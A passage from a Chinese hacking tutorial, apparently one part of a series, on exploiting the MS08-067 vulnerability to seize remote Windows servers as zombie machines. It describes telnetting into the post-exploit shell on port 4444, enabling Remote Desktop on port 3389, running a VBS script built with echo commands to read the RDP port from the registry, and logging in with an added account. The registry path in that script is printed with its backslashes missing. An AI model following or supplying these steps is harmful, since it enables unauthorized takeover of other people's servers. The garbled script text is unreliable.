利用MS08067远程溢出漏洞抓肉鸡

核心提示： 使用MS08067溢出工具成功溢出服务器后，还可以使用“telnet IP地址 4444”连接被溢出服务器，利用MS08067远程溢出漏洞抓肉鸡(5)，如图8所示，偶使用telnet进行了尝试，验证成功后，顺利进入服务器，获取系统信息并开放了3389端口，图8 使用

使用MS08067溢出工具成功溢出服务器后，还可以使用“telnet IP地址 4444”连接被溢出服务器，如图8所示，偶使用telnet进行了尝试，获取系统信息并开放了3389端口。

图8 使用telnet连接被溢出计算机

说明：

（1）使用telnet连接被溢出计算机不如反弹shell好用，在telnet中有可能看不到输入，或者输入后反应较为迟钝。

（2）开放3389的方式有很多，网上有很多资料，这里使用别人给的一个工具，直接执行即可。

（3）可以使用以下脚本来查看对方服务器3389端口：

Echo Dim ReadComputerName >>port.vbs
Echo Set ReadComputerName=WScript.CreateObject("WScript.Shell") >>port.vbs
Echo Dim TSName,TSRegPath >>port.vbs
Echo TSRegPath="HKLMSystemCurrentControlSetControlTerminal
ServerWinStationsRDP-TcpPortNumber" >>port.vbs
Echo TSName=ReadComputerName.RegRead(TSRegPath) >>port.vbs
Echo WScript.Echo("TermService port is:"^&TSName) >>port.vbs
Cscript port.vbs

9.登录被溢出服务器

打开mstsc远程终端连接器，输入IP地址、刚才添加的用户名和密码，验证成功后，顺利进入服务器，如图9所示。

图9 顺利进入被溢出服务器